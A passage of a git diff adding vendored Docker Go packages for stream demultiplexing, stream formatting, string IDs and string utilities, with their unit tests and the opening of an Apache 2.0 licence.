byte(t), + } +} + +// StdCopy is a modified version of io.Copy. +// +// StdCopy will demultiplex `src`, assuming that it contains two streams, +// previously multiplexed together using a StdWriter instance. +// As it reads from `src`, StdCopy will write to `dstout` and `dsterr`. +// +// StdCopy will read until it hits EOF on `src`. It will then return a nil error. +// In other words: if `err` is non nil, it indicates a real underlying error. +// +// `written` will hold the total number of bytes written to `dstout` and `dsterr`. +func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) { + var ( + buf = make([]byte, startingBufLen) + bufLen = len(buf) + nr, nw int + er, ew error + out io.Writer + frameSize int + ) + + for { + // Make sure we have at least a full header + for nr < stdWriterPrefixLen { + var nr2 int + nr2, er = src.Read(buf[nr:]) + nr += nr2 + if er == io.EOF { + if nr < stdWriterPrefixLen { + return written, nil + } + break + } + if er != nil { + return 0, er + } + } + + // Check the first byte to know where to write + switch StdType(buf[stdWriterFdIndex]) { + case Stdin: + fallthrough + case Stdout: + // Write on stdout + out = dstout + case Stderr: + // Write on stderr + out = dsterr + default: + return 0, fmt.Errorf("Unrecognized input header: %d", buf[stdWriterFdIndex]) + } + + // Retrieve the size of the frame + frameSize = int(binary.BigEndian.Uint32(buf[stdWriterSizeIndex : stdWriterSizeIndex+4])) + + // Check if the buffer is big enough to read the frame. + // Extend it if necessary. + if frameSize+stdWriterPrefixLen > bufLen { + buf = append(buf, make([]byte, frameSize+stdWriterPrefixLen-bufLen+1)...) + bufLen = len(buf) + } + + // While the amount of bytes read is less than the size of the frame + header, we keep reading + for nr < frameSize+stdWriterPrefixLen { + var nr2 int + nr2, er = src.Read(buf[nr:]) + nr += nr2 + if er == io.EOF { + if nr < frameSize+stdWriterPrefixLen { + return written, nil + } + break + } + if er != nil { + return 0, er + } + } + + // Write the retrieved frame (without header) + nw, ew = out.Write(buf[stdWriterPrefixLen : frameSize+stdWriterPrefixLen]) + if ew != nil { + return 0, ew + } + // If the frame has not been fully written: error + if nw != frameSize { + return 0, io.ErrShortWrite + } + written += int64(nw) + + // Move the rest of the buffer to the beginning + copy(buf, buf[frameSize+stdWriterPrefixLen:]) + // Move the index + nr -= frameSize + stdWriterPrefixLen + } +} diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go new file mode 100644 index 0000000000..3137a75239 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go @@ -0,0 +1,260 @@ +package stdcopy + +import ( + "bytes" + "errors" + "io" + "io/ioutil" + "strings" + "testing" +) + +func TestNewStdWriter(t *testing.T) { + writer := NewStdWriter(ioutil.Discard, Stdout) + if writer == nil { + t.Fatalf("NewStdWriter with an invalid StdType should not return nil.") + } +} + +func TestWriteWithUnitializedStdWriter(t *testing.T) { + writer := stdWriter{ + Writer: nil, + prefix: byte(Stdout), + } + n, err := writer.Write([]byte("Something here")) + if n != 0 || err == nil { + t.Fatalf("Should fail when given an uncomplete or uninitialized StdWriter") + } +} + +func TestWriteWithNilBytes(t *testing.T) { + writer := NewStdWriter(ioutil.Discard, Stdout) + n, err := writer.Write(nil) + if err != nil { + t.Fatalf("Shouldn't have fail when given no data") + } + if n > 0 { + t.Fatalf("Write should have written 0 byte, but has written %d", n) + } +} + +func TestWrite(t *testing.T) { + writer := NewStdWriter(ioutil.Discard, Stdout) + data := []byte("Test StdWrite.Write") + n, err := writer.Write(data) + if err != nil { + t.Fatalf("Error while writing with StdWrite") + } + if n != len(data) { + t.Fatalf("Write should have written %d byte but wrote %d.", len(data), n) + } +} + +type errWriter struct { + n int + err error +} + +func (f *errWriter) Write(buf []byte) (int, error) { + return f.n, f.err +} + +func TestWriteWithWriterError(t *testing.T) { + expectedError := errors.New("expected") + expectedReturnedBytes := 10 + writer := NewStdWriter(&errWriter{ + n: stdWriterPrefixLen + expectedReturnedBytes, + err: expectedError}, Stdout) + data := []byte("This won't get written, sigh") + n, err := writer.Write(data) + if err != expectedError { + t.Fatalf("Didn't get expected error.") + } + if n != expectedReturnedBytes { + t.Fatalf("Didn't get expected written bytes %d, got %d.", + expectedReturnedBytes, n) + } +} + +func TestWriteDoesNotReturnNegativeWrittenBytes(t *testing.T) { + writer := NewStdWriter(&errWriter{n: -1}, Stdout) + data := []byte("This won't get written, sigh") + actual, _ := writer.Write(data) + if actual != 0 { + t.Fatalf("Expected returned written bytes equal to 0, got %d", actual) + } +} + +func getSrcBuffer(stdOutBytes, stdErrBytes []byte) (buffer *bytes.Buffer, err error) { + buffer = new(bytes.Buffer) + dstOut := NewStdWriter(buffer, Stdout) + _, err = dstOut.Write(stdOutBytes) + if err != nil { + return + } + dstErr := NewStdWriter(buffer, Stderr) + _, err = dstErr.Write(stdErrBytes) + return +} + +func TestStdCopyWriteAndRead(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + written, err := StdCopy(ioutil.Discard, ioutil.Discard, buffer) + if err != nil { + t.Fatal(err) + } + expectedTotalWritten := len(stdOutBytes) + len(stdErrBytes) + if written != int64(expectedTotalWritten) { + t.Fatalf("Expected to have total of %d bytes written, got %d", expectedTotalWritten, written) + } +} + +type customReader struct { + n int + err error + totalCalls int + correctCalls int + src *bytes.Buffer +} + +func (f *customReader) Read(buf []byte) (int, error) { + f.totalCalls++ + if f.totalCalls <= f.correctCalls { + return f.src.Read(buf) + } + return f.n, f.err +} + +func TestStdCopyReturnsErrorReadingHeader(t *testing.T) { + expectedError := errors.New("error") + reader := &customReader{ + err: expectedError} + written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader) + if written != 0 { + t.Fatalf("Expected 0 bytes read, got %d", written) + } + if err != expectedError { + t.Fatalf("Didn't get expected error") + } +} + +func TestStdCopyReturnsErrorReadingFrame(t *testing.T) { + expectedError := errors.New("error") + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + reader := &customReader{ + correctCalls: 1, + n: stdWriterPrefixLen + 1, + err: expectedError, + src: buffer} + written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader) + if written != 0 { + t.Fatalf("Expected 0 bytes read, got %d", written) + } + if err != expectedError { + t.Fatalf("Didn't get expected error") + } +} + +func TestStdCopyDetectsCorruptedFrame(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + reader := &customReader{ + correctCalls: 1, + n: stdWriterPrefixLen + 1, + err: io.EOF, + src: buffer} + written, err := StdCopy(ioutil.Discard, ioutil.Discard, reader) + if written != startingBufLen { + t.Fatalf("Expected %d bytes read, got %d", startingBufLen, written) + } + if err != nil { + t.Fatal("Didn't get nil error") + } +} + +func TestStdCopyWithInvalidInputHeader(t *testing.T) { + dstOut := NewStdWriter(ioutil.Discard, Stdout) + dstErr := NewStdWriter(ioutil.Discard, Stderr) + src := strings.NewReader("Invalid input") + _, err := StdCopy(dstOut, dstErr, src) + if err == nil { + t.Fatal("StdCopy with invalid input header should fail.") + } +} + +func TestStdCopyWithCorruptedPrefix(t *testing.T) { + data := []byte{0x01, 0x02, 0x03} + src := bytes.NewReader(data) + written, err := StdCopy(nil, nil, src) + if err != nil { + t.Fatalf("StdCopy should not return an error with corrupted prefix.") + } + if written != 0 { + t.Fatalf("StdCopy should have written 0, but has written %d", written) + } +} + +func TestStdCopyReturnsWriteErrors(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + expectedError := errors.New("expected") + + dstOut := &errWriter{err: expectedError} + + written, err := StdCopy(dstOut, ioutil.Discard, buffer) + if written != 0 { + t.Fatalf("StdCopy should have written 0, but has written %d", written) + } + if err != expectedError { + t.Fatalf("Didn't get expected error, got %v", err) + } +} + +func TestStdCopyDetectsNotFullyWrittenFrames(t *testing.T) { + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + dstOut := &errWriter{n: startingBufLen - 10} + + written, err := StdCopy(dstOut, ioutil.Discard, buffer) + if written != 0 { + t.Fatalf("StdCopy should have return 0 written bytes, but returned %d", written) + } + if err != io.ErrShortWrite { + t.Fatalf("Didn't get expected io.ErrShortWrite error") + } +} + +func BenchmarkWrite(b *testing.B) { + w := NewStdWriter(ioutil.Discard, Stdout) + data := []byte("Test line for testing stdwriter performance\n") + data = bytes.Repeat(data, 100) + b.SetBytes(int64(len(data))) + b.ResetTimer() + for i := 0; i < b.N; i++ { + if _, err := w.Write(data); err != nil { + b.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go new file mode 100644 index 0000000000..ce6ea79dee --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go @@ -0,0 +1,172 @@ +// Package streamformatter provides helper functions to format a stream. +package streamformatter + +import ( + "encoding/json" + "fmt" + "io" + + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/progress" +) + +// StreamFormatter formats a stream, optionally using JSON. +type StreamFormatter struct { + json bool +} + +// NewStreamFormatter returns a simple StreamFormatter +func NewStreamFormatter() *StreamFormatter { + return &StreamFormatter{} +} + +// NewJSONStreamFormatter returns a StreamFormatter configured to stream json +func NewJSONStreamFormatter() *StreamFormatter { + return &StreamFormatter{true} +} + +const streamNewline = "\r\n" + +var streamNewlineBytes = []byte(streamNewline) + +// FormatStream formats the specified stream. +func (sf *StreamFormatter) FormatStream(str string) []byte { + if sf.json { + b, err := json.Marshal(&jsonmessage.JSONMessage{Stream: str}) + if err != nil { + return sf.FormatError(err) + } + return append(b, streamNewlineBytes...) + } + return []byte(str + "\r") +} + +// FormatStatus formats the specified objects according to the specified format (and id). +func (sf *StreamFormatter) FormatStatus(id, format string, a ...interface{}) []byte { + str := fmt.Sprintf(format, a...) + if sf.json { + b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str}) + if err != nil { + return sf.FormatError(err) + } + return append(b, streamNewlineBytes...) + } + return []byte(str + streamNewline) +} + +// FormatError formats the specified error. +func (sf *StreamFormatter) FormatError(err error) []byte { + if sf.json { + jsonError, ok := err.(*jsonmessage.JSONError) + if !ok { + jsonError = &jsonmessage.JSONError{Message: err.Error()} + } + if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil { + return append(b, streamNewlineBytes...) + } + return []byte("{\"error\":\"format error\"}" + streamNewline) + } + return []byte("Error: " + err.Error() + streamNewline) +} + +// FormatProgress formats the progress information for a specified action. +func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { + if progress == nil { + progress = &jsonmessage.JSONProgress{} + } + if sf.json { + var auxJSON *json.RawMessage + if aux != nil { + auxJSONBytes, err := json.Marshal(aux) + if err != nil { + return nil + } + auxJSON = new(json.RawMessage) + *auxJSON = auxJSONBytes + } + b, err := json.Marshal(&jsonmessage.JSONMessage{ + Status: action, + ProgressMessage: progress.String(), + Progress: progress, + ID: id, + Aux: auxJSON, + }) + if err != nil { + return nil + } + return append(b, streamNewlineBytes...) + } + endl := "\r" + if progress.String() == "" { + endl += "\n" + } + return []byte(action + " " + progress.String() + endl) +} + +// NewProgressOutput returns a progress.Output object that can be passed to +// progress.NewProgressReader. +func (sf *StreamFormatter) NewProgressOutput(out io.Writer, newLines bool) progress.Output { + return &progressOutput{ + sf: sf, + out: out, + newLines: newLines, + } +} + +type progressOutput struct { + sf *StreamFormatter + out io.Writer + newLines bool +} + +// WriteProgress formats progress information from a ProgressReader. +func (out *progressOutput) WriteProgress(prog progress.Progress) error { + var formatted []byte + if prog.Message != "" { + formatted = out.sf.FormatStatus(prog.ID, prog.Message) + } else { + jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total} + formatted = out.sf.FormatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux) + } + _, err := out.out.Write(formatted) + if err != nil { + return err + } + + if out.newLines && prog.LastUpdate { + _, err = out.out.Write(out.sf.FormatStatus("", "")) + return err + } + + return nil +} + +// StdoutFormatter is a streamFormatter that writes to the standard output. +type StdoutFormatter struct { + io.Writer + *StreamFormatter +} + +func (sf *StdoutFormatter) Write(buf []byte) (int, error) { + formattedBuf := sf.StreamFormatter.FormatStream(string(buf)) + n, err := sf.Writer.Write(formattedBuf) + if n != len(formattedBuf) { + return n, io.ErrShortWrite + } + return len(buf), err +} + +// StderrFormatter is a streamFormatter that writes to the standard error. +type StderrFormatter struct { + io.Writer + *StreamFormatter +} + +func (sf *StderrFormatter) Write(buf []byte) (int, error) { + formattedBuf := sf.StreamFormatter.FormatStream("\033[91m" + string(buf) + "\033[0m") + n, err := sf.Writer.Write(formattedBuf) + if n != len(formattedBuf) { + return n, io.ErrShortWrite + } + return len(buf), err +} diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go new file mode 100644 index 0000000000..93ec90f5f7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go @@ -0,0 +1,108 @@ +package streamformatter + +import ( + "encoding/json" + "errors" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/pkg/jsonmessage" +) + +func TestFormatStream(t *testing.T) { + sf := NewStreamFormatter() + res := sf.FormatStream("stream") + if string(res) != "stream"+"\r" { + t.Fatalf("%q", res) + } +} + +func TestFormatJSONStatus(t *testing.T) { + sf := NewStreamFormatter() + res := sf.FormatStatus("ID", "%s%d", "a", 1) + if string(res) != "a1\r\n" { + t.Fatalf("%q", res) + } +} + +func TestFormatSimpleError(t *testing.T) { + sf := NewStreamFormatter() + res := sf.FormatError(errors.New("Error for formatter")) + if string(res) != "Error: Error for formatter\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatStream(t *testing.T) { + sf := NewJSONStreamFormatter() + res := sf.FormatStream("stream") + if string(res) != `{"stream":"stream"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatStatus(t *testing.T) { + sf := NewJSONStreamFormatter() + res := sf.FormatStatus("ID", "%s%d", "a", 1) + if string(res) != `{"status":"a1","id":"ID"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatSimpleError(t *testing.T) { + sf := NewJSONStreamFormatter() + res := sf.FormatError(errors.New("Error for formatter")) + if string(res) != `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatJSONError(t *testing.T) { + sf := NewJSONStreamFormatter() + err := &jsonmessage.JSONError{Code: 50, Message: "Json error"} + res := sf.FormatError(err) + if string(res) != `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}`+"\r\n" { + t.Fatalf("%q", res) + } +} + +func TestJSONFormatProgress(t *testing.T) { + sf := NewJSONStreamFormatter() + progress := &jsonmessage.JSONProgress{ + Current: 15, + Total: 30, + Start: 1, + } + res := sf.FormatProgress("id", "action", progress, nil) + msg := &jsonmessage.JSONMessage{} + if err := json.Unmarshal(res, msg); err != nil { + t.Fatal(err) + } + if msg.ID != "id" { + t.Fatalf("ID must be 'id', got: %s", msg.ID) + } + if msg.Status != "action" { + t.Fatalf("Status must be 'action', got: %s", msg.Status) + } + + // The progress will always be in the format of: + // [=========================> ] 15 B/30 B 404933h7m11s + // The last entry '404933h7m11s' is the timeLeftBox. + // However, the timeLeftBox field may change as progress.String() depends on time.Now(). + // Therefore, we have to strip the timeLeftBox from the strings to do the comparison. + + // Compare the progress strings before the timeLeftBox + expectedProgress := "[=========================> ] 15 B/30 B" + // if terminal column is <= 110, expectedProgressShort is expected. + expectedProgressShort := " 15 B/30 B" + if !(strings.HasPrefix(msg.ProgressMessage, expectedProgress) || + strings.HasPrefix(msg.ProgressMessage, expectedProgressShort)) { + t.Fatalf("ProgressMessage without the timeLeftBox must be %s or %s, got: %s", + expectedProgress, expectedProgressShort, msg.ProgressMessage) + } + + if !reflect.DeepEqual(msg.Progress, progress) { + t.Fatal("Original progress not equals progress from FormatProgress") + } +} diff --git a/vendor/github.com/docker/docker/pkg/stringid/README.md b/vendor/github.com/docker/docker/pkg/stringid/README.md new file mode 100644 index 0000000000..37a5098fd9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringid/README.md @@ -0,0 +1 @@ +This package provides helper functions for dealing with string identifiers diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid.go b/vendor/github.com/docker/docker/pkg/stringid/stringid.go new file mode 100644 index 0000000000..fa35d8bad5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid.go @@ -0,0 +1,69 @@ +// Package stringid provides helper functions for dealing with string identifiers +package stringid + +import ( + "crypto/rand" + "encoding/hex" + "io" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/pkg/random" +) + +const shortLen = 12 + +var validShortID = regexp.MustCompile("^[a-z0-9]{12}$") + +// IsShortID determines if an arbitrary string *looks like* a short ID. +func IsShortID(id string) bool { + return validShortID.MatchString(id) +} + +// TruncateID returns a shorthand version of a string identifier for convenience. +// A collision with other shorthands is very unlikely, but possible. +// In case of a collision a lookup with TruncIndex.Get() will fail, and the caller +// will need to use a longer prefix, or the full-length Id. +func TruncateID(id string) string { + if i := strings.IndexRune(id, ':'); i >= 0 { + id = id[i+1:] + } + if len(id) > shortLen { + id = id[:shortLen] + } + return id +} + +func generateID(crypto bool) string { + b := make([]byte, 32) + r := random.Reader + if crypto { + r = rand.Reader + } + for { + if _, err := io.ReadFull(r, b); err != nil { + panic(err) // This shouldn't happen + } + id := hex.EncodeToString(b) + // if we try to parse the truncated for as an int and we don't have + // an error then the value is all numeric and causes issues when + // used as a hostname. ref #3869 + if _, err := strconv.ParseInt(TruncateID(id), 10, 64); err == nil { + continue + } + return id + } +} + +// GenerateRandomID returns a unique id. +func GenerateRandomID() string { + return generateID(true) +} + +// GenerateNonCryptoID generates unique id without using cryptographically +// secure sources of random. +// It helps you to save entropy. +func GenerateNonCryptoID() string { + return generateID(false) +} diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go new file mode 100644 index 0000000000..8ff6b4383d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go @@ -0,0 +1,72 @@ +package stringid + +import ( + "strings" + "testing" +) + +func TestGenerateRandomID(t *testing.T) { + id := GenerateRandomID() + + if len(id) != 64 { + t.Fatalf("Id returned is incorrect: %s", id) + } +} + +func TestGenerateNonCryptoID(t *testing.T) { + id := GenerateNonCryptoID() + + if len(id) != 64 { + t.Fatalf("Id returned is incorrect: %s", id) + } +} + +func TestShortenId(t *testing.T) { + id := "90435eec5c4e124e741ef731e118be2fc799a68aba0466ec17717f24ce2ae6a2" + truncID := TruncateID(id) + if truncID != "90435eec5c4e" { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenSha256Id(t *testing.T) { + id := "sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba" + truncID := TruncateID(id) + if truncID != "4e38e38c8ce0" { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdEmpty(t *testing.T) { + id := "" + truncID := TruncateID(id) + if len(truncID) > len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdInvalid(t *testing.T) { + id := "1234" + truncID := TruncateID(id) + if len(truncID) != len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestIsShortIDNonHex(t *testing.T) { + id := "some non-hex value" + if IsShortID(id) { + t.Fatalf("%s is not a short ID", id) + } +} + +func TestIsShortIDNotCorrectSize(t *testing.T) { + id := strings.Repeat("a", shortLen+1) + if IsShortID(id) { + t.Fatalf("%s is not a short ID", id) + } + id = strings.Repeat("a", shortLen-1) + if IsShortID(id) { + t.Fatalf("%s is not a short ID", id) + } +} diff --git a/vendor/github.com/docker/docker/pkg/stringutils/README.md b/vendor/github.com/docker/docker/pkg/stringutils/README.md new file mode 100644 index 0000000000..b3e454573c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringutils/README.md @@ -0,0 +1 @@ +This package provides helper functions for dealing with strings diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go new file mode 100644 index 0000000000..8e1c812d7a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go @@ -0,0 +1,101 @@ +// Package stringutils provides helper functions for dealing with strings. +package stringutils + +import ( + "bytes" + "math/rand" + "strings" + + "github.com/docker/docker/pkg/random" +) + +// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n. +func GenerateRandomAlphaOnlyString(n int) string { + // make a really long string + letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") + b := make([]byte, n) + for i := range b { + b[i] = letters[random.Rand.Intn(len(letters))] + } + return string(b) +} + +// GenerateRandomASCIIString generates an ASCII random string with length n. +func GenerateRandomASCIIString(n int) string { + chars := "abcdefghijklmnopqrstuvwxyz" + + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + + "~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:` " + res := make([]byte, n) + for i := 0; i < n; i++ { + res[i] = chars[rand.Intn(len(chars))] + } + return string(res) +} + +// Ellipsis truncates a string to fit within maxlen, and appends ellipsis (...). +// For maxlen of 3 and lower, no ellipsis is appended. +func Ellipsis(s string, maxlen int) string { + r := []rune(s) + if len(r) <= maxlen { + return s + } + if maxlen <= 3 { + return string(r[:maxlen]) + } + return string(r[:maxlen-3]) + "..." +} + +// Truncate truncates a string to maxlen. +func Truncate(s string, maxlen int) string { + r := []rune(s) + if len(r) <= maxlen { + return s + } + return string(r[:maxlen]) +} + +// InSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case insensitive +func InSlice(slice []string, s string) bool { + for _, ss := range slice { + if strings.ToLower(s) == strings.ToLower(ss) { + return true + } + } + return false +} + +func quote(word string, buf *bytes.Buffer) { + // Bail out early for "simple" strings + if word != "" && !strings.ContainsAny(word, "\\'\"`${[|&;<>()~*?! \t\n") { + buf.WriteString(word) + return + } + + buf.WriteString("'") + + for i := 0; i < len(word); i++ { + b := word[i] + if b == '\'' { + // Replace literal ' with a close ', a \', and a open ' + buf.WriteString("'\\''") + } else { + buf.WriteByte(b) + } + } + + buf.WriteString("'") +} + +// ShellQuoteArguments takes a list of strings and escapes them so they will be +// handled right when passed as arguments to a program via a shell +func ShellQuoteArguments(args []string) string { + var buf bytes.Buffer + for i, arg := range args { + if i != 0 { + buf.WriteByte(' ') + } + quote(arg, &buf) + } + return buf.String() +} diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go new file mode 100644 index 0000000000..8af2bdcc0b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go @@ -0,0 +1,121 @@ +package stringutils + +import "testing" + +func testLengthHelper(generator func(int) string, t *testing.T) { + expectedLength := 20 + s := generator(expectedLength) + if len(s) != expectedLength { + t.Fatalf("Length of %s was %d but expected length %d", s, len(s), expectedLength) + } +} + +func testUniquenessHelper(generator func(int) string, t *testing.T) { + repeats := 25 + set := make(map[string]struct{}, repeats) + for i := 0; i < repeats; i = i + 1 { + str := generator(64) + if len(str) != 64 { + t.Fatalf("Id returned is incorrect: %s", str) + } + if _, ok := set[str]; ok { + t.Fatalf("Random number is repeated") + } + set[str] = struct{}{} + } +} + +func isASCII(s string) bool { + for _, c := range s { + if c > 127 { + return false + } + } + return true +} + +func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) { + testLengthHelper(GenerateRandomAlphaOnlyString, t) +} + +func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) { + testUniquenessHelper(GenerateRandomAlphaOnlyString, t) +} + +func TestGenerateRandomAsciiStringLength(t *testing.T) { + testLengthHelper(GenerateRandomASCIIString, t) +} + +func TestGenerateRandomAsciiStringUniqueness(t *testing.T) { + testUniquenessHelper(GenerateRandomASCIIString, t) +} + +func TestGenerateRandomAsciiStringIsAscii(t *testing.T) { + str := GenerateRandomASCIIString(64) + if !isASCII(str) { + t.Fatalf("%s contained non-ascii characters", str) + } +} + +func TestEllipsis(t *testing.T) { + str := "t🐳ststring" + newstr := Ellipsis(str, 3) + if newstr != "t🐳s" { + t.Fatalf("Expected t🐳s, got %s", newstr) + } + newstr = Ellipsis(str, 8) + if newstr != "t🐳sts..." { + t.Fatalf("Expected tests..., got %s", newstr) + } + newstr = Ellipsis(str, 20) + if newstr != "t🐳ststring" { + t.Fatalf("Expected t🐳ststring, got %s", newstr) + } +} + +func TestTruncate(t *testing.T) { + str := "t🐳ststring" + newstr := Truncate(str, 4) + if newstr != "t🐳st" { + t.Fatalf("Expected t🐳st, got %s", newstr) + } + newstr = Truncate(str, 20) + if newstr != "t🐳ststring" { + t.Fatalf("Expected t🐳ststring, got %s", newstr) + } +} + +func TestInSlice(t *testing.T) { + slice := []string{"t🐳st", "in", "slice"} + + test := InSlice(slice, "t🐳st") + if !test { + t.Fatalf("Expected string t🐳st to be in slice") + } + test = InSlice(slice, "SLICE") + if !test { + t.Fatalf("Expected string SLICE to be in slice") + } + test = InSlice(slice, "notinslice") + if test { + t.Fatalf("Expected string notinslice not to be in slice") + } +} + +func TestShellQuoteArgumentsEmpty(t *testing.T) { + actual := ShellQuoteArguments([]string{}) + expected := "" + if actual != expected { + t.Fatalf("Expected an empty string") + } +} + +func TestShellQuoteArguments(t *testing.T) { + simpleString := "simpleString" + complexString := "This is a 'more' complex $tring with some special char *" + actual := ShellQuoteArguments([]string{simpleString, complexString}) + expected := "simpleString 'This is a '\\''more'\\'' complex $tring with some special char *'" + if actual != expected { + t.Fatalf("Expected \"%v\", got \"%v\"", expected, actual) + } +} diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE new file mode 100644 index 0000000000..34c4ea7c50 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE @@ -0,0 +1,191 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + 